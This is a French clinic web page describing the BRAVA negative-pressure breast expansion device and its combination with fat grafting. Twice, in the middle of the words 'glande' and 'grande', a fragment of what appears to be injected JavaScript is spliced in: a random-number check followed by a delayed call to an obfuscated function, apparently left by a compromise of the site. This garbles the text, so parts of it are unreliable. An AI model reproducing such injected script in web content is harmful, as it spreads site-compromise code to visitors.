Une équipe au cœur de votre bien-être

Clinique Bretéché - Nantes

Système Brava

L’appareillage BRAVA® a été développé il y a quelques années aux USA par le Dr Khouri et il retrouve un nouvel élan avec le développement du lipomodelage dans le sein.

Principe

Le Brava® utilise le principe de pression négative tri-dimentionnelle (succion) qui génère une traction homogène sur toutes les cellules de la glandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande mammaire, créant ainsi peu à peu des espaces libres qui vont pouvoir régénérer de nouveaux tissus adipocytaires (graisse), augmentant ainsi naturellement le volume du sein.

Ainsi le Brava® peut être utilisé isolément sans chirurgie mais cela nécessite son utilisation pendant 10 à 15 semaines à raison d’au moins 11 heures/jour.

La taille d’un petit bonnet supplémentaire peut ainsi être obtenu.

Le système Brava associé au Lipomodelage

Des équipes américaines et italiennes l’associent au lipomodelage depuis 2 ans environ avec d’excellents résultats tant en reconstruction qu’en esthétique. Nous appliquons cette technique depuis le début de l’année 2011 dans notre unité, le Brava® étant commercialisé en France depuis seulement décembre 2010.

Il s’agit d’une méthode contraignante pour la patiente mais qui peut augmenter de manière considérable le taux de prise de la graisse injectée et de ce fait diminuer le nombre d’interventions nécessaires en cas de reconstruction et permettre d’obtenir un volume plus important en augmentation mammaire esthétique.

En cas de réalisation du lipomodelage, le Brava® est mis en place sur la zone à opérer plusieurs heures par jours (11 h) pendant 4 semaines préopératoires et 3 semaines postopératoires après le lipomodelage selon un calendrier préétabli.

Cet effet aspiratif continu crée une distension progressive de la zone à injecter, permettant de recevoir une plus grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande quantité de tissu graisseux.

brava

brava2

Dernière modification : 12/11/2014